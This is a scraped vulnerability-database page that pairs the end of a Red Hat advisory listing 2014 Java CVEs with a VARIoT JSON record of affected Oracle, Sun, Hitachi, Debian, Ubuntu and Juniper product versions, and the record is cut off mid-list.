https://www.redhat.com/security/data/cve/CVE-2014-0429.html https://www.redhat.com/security/data/cve/CVE-2014-0446.html https://www.redhat.com/security/data/cve/CVE-2014-0451.html https://www.redhat.com/security/data/cve/CVE-2014-0452.html https://www.redhat.com/security/data/cve/CVE-2014-0453.html https://www.redhat.com/security/data/cve/CVE-2014-0456.html https://www.redhat.com/security/data/cve/CVE-2014-0457.html https://www.redhat.com/security/data/cve/CVE-2014-0458.html https://www.redhat.com/security/data/cve/CVE-2014-0460.html https://www.redhat.com/security/data/cve/CVE-2014-0461.html https://www.redhat.com/security/data/cve/CVE-2014-1876.html https://www.redhat.com/security/data/cve/CVE-2014-2397.html https://www.redhat.com/security/data/cve/CVE-2014-2398.html https://www.redhat.com/security/data/cve/CVE-2014-2403.html https://www.redhat.com/security/data/cve/CVE-2014-2412.html https://www.redhat.com/security/data/cve/CVE-2014-2414.html https://www.redhat.com/security/data/cve/CVE-2014-2421.html https://www.redhat.com/security/data/cve/CVE-2014-2423.html https://www.redhat.com/security/data/cve/CVE-2014-2427.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTTm2zXlSAg2UNWIIRAkZ8AJ4tQFSY3KSdfOiDJA5KJWO9IJa1BACeMLJ6 PQHHIgiQ5K7Q4/GEJAHNU94= =9aj6 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0381", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre", "scope": "eq", "trust": 1.3, "vendor": "oracle", "version": "1.8.0" }, { "model": "cosminexus application server", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "junos space", "scope": "lt", "trust": 1.0, "vendor": "juniper", "version": "15.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.10" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r28.3.1" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "13.10" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "10.04" }, { "model": "jrockit", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "r27.8.1" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server enterprise )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server enterprise 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "0107-00" }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus application server 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "jdk 1.7.0 17", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus service architect )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus studio 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "05-00" }, { "model": "jre 1.7.0 21", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus client )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-50" }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "cosminexus developer 05-05-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus client 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "jdk 1.5.0 41", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus primary server base 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 12", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-71" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "08-50" }, { "model": "cosminexus developer professional 06-00-/i", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional 06-50-/c", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus primary server base )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-51" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "0108-50" }, { "model": "cosminexus application server standard 06-50-/f", "scope": null, "trust": 0.6, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "06-02" }, { "model": "jdk .0 